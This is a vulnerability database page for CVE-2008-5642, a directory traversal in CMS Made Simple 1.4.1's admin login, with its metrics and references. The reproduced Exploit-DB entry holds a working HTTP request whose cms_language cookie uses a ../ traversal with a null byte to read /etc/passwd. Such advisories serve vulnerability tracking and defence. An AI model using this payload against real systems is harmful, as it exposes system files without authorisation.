CVE-2008-5642 : Detail

CVE-2008-5642

Directory Traversal
A01-Broken Access Control
2.7%V3
Network
2008-12-17
16h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Directory traversal vulnerability in admin/login.php in CMS Made Simple 1.4.1 allows remote attackers to read arbitrary files via a .. (dot dot) in a cms_language cookie.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 7285

Publication date : 2008-11-28
23h00 +00:00
Author : M4ck-h@cK
EDB Verified : Yes

Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation Vendor: CMS Made Simple Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...) Author: M4ck-h@cK Date 29.11.2008 Home: sweet home contact: no, thx :) Exploit: Demo: on h[ttp://demo.cmsmadesimple.fr/admin/] GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: demo.cmsmadesimple.fr Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1 Connection: Close Pragma: no-cache It's possible to set "cms_language" value in order to view /etc/passwd file. # milw0rm.com [2008-11-29]

Products Mentioned

Configuraton 0

Cmsmadesimple>>Cms_made_simple >> Version 1.4.1

References

https://www.exploit-db.com/exploits/7285
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/32924
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/4775
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/32535
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2008/3306
Tags : vdb-entry, x_refsource_VUPEN